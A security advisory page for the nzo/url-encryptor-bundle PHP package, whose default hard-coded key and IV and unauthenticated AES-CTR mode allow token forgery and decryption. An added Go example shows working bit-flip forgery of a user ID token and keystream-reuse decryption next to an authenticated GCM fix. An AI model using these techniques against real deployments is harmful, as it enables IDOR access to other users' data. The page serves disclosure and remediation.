Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS1yMnI4LTM2cHEtMjdjbc4AA8Rw
nzo/url-encryptor-bundle Insecure default secret key and IV allowing anyone to decrypt values
Versions of nzo/url-encryptor-bundle prior to 4.3.2 (4.x branch) and 5.0.1 (5.x branch) ship with a default secret key and IV instead of requiring the application to supply its own, so any deployment that keeps the defaults encrypts with values known to anyone who reads the bundle's source. By default the bundle uses aes-256-ctr, an unauthenticated stream mode in which flipping a ciphertext bit flips the corresponding plaintext bit; an attacker can therefore rewrite an encrypted identifier in a URL without knowing the key, which turns the "encrypted" parameter into a potential Insecure Direct Object Reference (IDOR) vector. In addition, because every value is encrypted under the same key and IV, the keystream is reused across messages: anyone who can guess the plaintext of one ciphertext recovers the keystream and can decrypt or forge any other value of up to that length.
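The two failure modes described above (CTR malleability and keystream reuse under a fixed key and IV) in working code. This is an added example in Go, not code from the bundle or the advisory; the key and IV values are constructed stand-ins, not the bundle's real defaults, and the AES-GCM "hardened" functions are the editor's suggested shape of a fix, not the project's actual patch.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"errors"
	"fmt"
	"io"
)

// Constructed stand-ins for a hard-coded default key and IV (not the bundle's
// real values). Any fixed, shared key+IV pair behaves exactly the same way.
var (
	defaultKey = []byte("0123456789abcdef0123456789abcdef") // 32 bytes -> AES-256
	defaultIV  = []byte("fedcba9876543210")                 // 16 bytes, never rotated
)

// ctrXor applies AES-256-CTR. CTR is a stream mode: encryption and decryption
// are the same XOR against a keystream derived only from (key, iv).
func ctrXor(key, iv, data []byte) []byte {
	block, err := aes.NewCipher(key)
	if err != nil {
		panic(err)
	}
	out := make([]byte, len(data))
	cipher.NewCTR(block, iv).XORKeyStream(out, data)
	return out
}

// encryptWithDefaults models the insecure configuration: every value ever
// produced shares one keystream.
func encryptWithDefaults(plaintext []byte) []byte {
	return ctrXor(defaultKey, defaultIV, plaintext)
}

// tamperCtr is attack 1 (malleability): with no knowledge of the key, XOR the
// difference between the plaintext we own and the plaintext we want into the
// ciphertext. The server decrypts it to the wanted value (an IDOR primitive).
func tamperCtr(ciphertext, knownPlaintext, wantedPlaintext []byte) ([]byte, error) {
	if len(knownPlaintext) != len(wantedPlaintext) || len(ciphertext) < len(knownPlaintext) {
		return nil, errors.New("known and wanted plaintext must have equal length")
	}
	forged := append([]byte(nil), ciphertext...)
	for i := range knownPlaintext {
		forged[i] ^= knownPlaintext[i] ^ wantedPlaintext[i]
	}
	return forged, nil
}

// recoverKeystream is attack 2 (keystream reuse): one known plaintext/ciphertext
// pair yields the keystream prefix shared by every value under the same key+IV.
func recoverKeystream(ciphertext, plaintext []byte) []byte {
	ks := make([]byte, len(plaintext))
	for i := range plaintext {
		ks[i] = ciphertext[i] ^ plaintext[i]
	}
	return ks
}

// decryptWithKeystream reads another user's value using only the recovered keystream.
func decryptWithKeystream(ks, ciphertext []byte) ([]byte, error) {
	if len(ciphertext) > len(ks) {
		return nil, errors.New("recovered keystream shorter than ciphertext")
	}
	pt := make([]byte, len(ciphertext))
	for i := range ciphertext {
		pt[i] = ciphertext[i] ^ ks[i]
	}
	return pt, nil
}

// sealGCM / openGCM: the editor's suggested hardened shape (assumption, not the
// bundle's fix): caller-supplied key, fresh random nonce per message, and an
// authenticated mode so a tampered token is rejected instead of decrypted.
func sealGCM(key, plaintext []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	aead, err := cipher.NewGCM(block)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, aead.NonceSize())
	if _, err := io.ReadFull(rand.Reader, nonce); err != nil {
		return nil, err
	}
	return append(nonce, aead.Seal(nil, nonce, plaintext, nil)...), nil
}

func openGCM(key, sealed []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	aead, err := cipher.NewGCM(block)
	if err != nil {
		return nil, err
	}
	if len(sealed) < aead.NonceSize() {
		return nil, errors.New("token too short")
	}
	return aead.Open(nil, sealed[:aead.NonceSize()], sealed[aead.NonceSize():], nil)
}

func main() {
	mine := encryptWithDefaults([]byte("user_id=1042"))
	forged, _ := tamperCtr(mine, []byte("user_id=1042"), []byte("user_id=1043"))
	fmt.Printf("forged token decrypts to %q\n", ctrXor(defaultKey, defaultIV, forged))

	ks := recoverKeystream(mine, []byte("user_id=1042"))
	other := encryptWithDefaults([]byte("invoice=77")) // someone else's value
	pt, _ := decryptWithKeystream(ks, other)
	fmt.Printf("other user's value: %q\n", pt)

	sealed, _ := sealGCM(defaultKey, []byte("user_id=1042"))
	sealed[len(sealed)-1] ^= 1 // flip one bit of the tag
	_, err := openGCM(defaultKey, sealed)
	fmt.Println("tampered GCM token rejected:", err != nil)
}
```

Note that the hardened form only helps if the key is actually supplied by the application; a random nonce per message and an authentication tag do nothing against an attacker who knows the key, which is why the advisory treats the missing mandatory key as the root cause rather than the mode alone.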
Permalink: https://github.com/advisories/GHSA-r2r8-36pq-27cm
JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1yMnI4LTM2cHEtMjdjbc4AA8Rw
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: 6 months ago
Updated: 6 months ago
Identifiers: GHSA-r2r8-36pq-27cm
References:
- https://github.com/nayzo/NzoUrlEncryptorBundle/commit/ba3af1a9bcf3bedcc0ed5948979f482e2134da1a
- https://github.com/nayzo/NzoUrlEncryptorBundle/commit/bd8232501c12c9df1bc45b1970870ef665218581
- https://github.com/FriendsOfPHP/security-advisories/blob/master/nzo/url-encryptor-bundle/2020-05-03.yaml
- https://github.com/advisories/GHSA-r2r8-36pq-27cm
Blast Radius: 0.0
Affected Packages
packagist:nzo/url-encryptor-bundle
Dependent packages: 1
Dependent repositories: 25
Downloads: 803,075 total
Affected Version Ranges: >= 4.0.0, < 4.3.2, >= 5.0.0, < 5.0.1
Fixed in: 4.3.2, 5.0.1
All affected versions: 4.1.0, 4.2.0, 4.2.1, 4.2.2, 4.2.3, 4.3.0, 4.3.1, 5.0.0
All unaffected versions: 4.3.2, 4.4.0, 4.5.0, 5.0.1, 5.1.0, 5.2.0, 6.0.0, 6.0.1, 6.1.0, 6.1.1, 6.2.0, 6.2.1, 6.2.2, 6.2.3, 6.2.4, 6.2.5, 6.2.6, 6.2.7, 6.2.8, 6.2.9, 6.3.0, 6.3.1, 6.3.2, 6.3.3